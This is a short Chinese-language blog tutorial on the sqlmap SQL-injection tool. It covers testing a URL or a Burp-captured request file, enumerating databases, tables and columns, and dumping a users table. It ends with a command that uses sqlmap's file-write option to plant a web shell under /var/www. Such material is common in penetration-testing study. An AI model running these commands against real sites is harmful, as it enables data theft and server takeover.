Sqlmap ---- 数据库的枚举
sqlmap -u http://test.com?id=1
sqlmap -r note.txt
其中note.txt为 burpsuite中抓取到的 可能存在sql注入的数据包。 可以直接放在一个文件中 让sqlmap去读取,并且识别是否存在sql注入漏洞
同时还可以和正常的利用一样增加参数 例如:
sqlmap -r note.txt -T users --dump
SQLMap 是一款开源的自动化 SQL 注入和数据库接管工具。它非常强大,能够检测和利用多种 SQL 注入漏洞。使用 SQLMap 可以帮助您识别网站中的 SQL 注入漏洞,并在渗透测试中进行利用。
SQLMap 主要特点
- 自动检测和利用 SQL 注入漏洞:能够自动识别 SQL 注入类型,包括盲注、时间盲注等。
- 支持多种数据库系统:包括 MySQL、Oracle、PostgreSQL、MSSQL、SQLite 等。
- 数据提取:能够提取数据库中的数据,如用户账户、密码、数据库结构等。
- 命令执行:某些 SQL 注入漏洞允许执行操作系统命令,SQLMap 也支持这种功能。
- 支持多种注入技术:包括 UNION 查询、布尔盲注、基于时间的盲注等。
使用示例
- 基础命令:
sqlmap -u "http://example.com/page.php?id=1" - 数据库枚举:
sqlmap -u "http://example.com/page.php?id=1" --dbs - 表枚举:
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables - 数据提取:
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns
遇到的实例
sqlmap -r 2.txt --batch --file-write /tmp/shell.php --file-dest /var/www/shell1.php #用sql注入来写入反弹shell
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
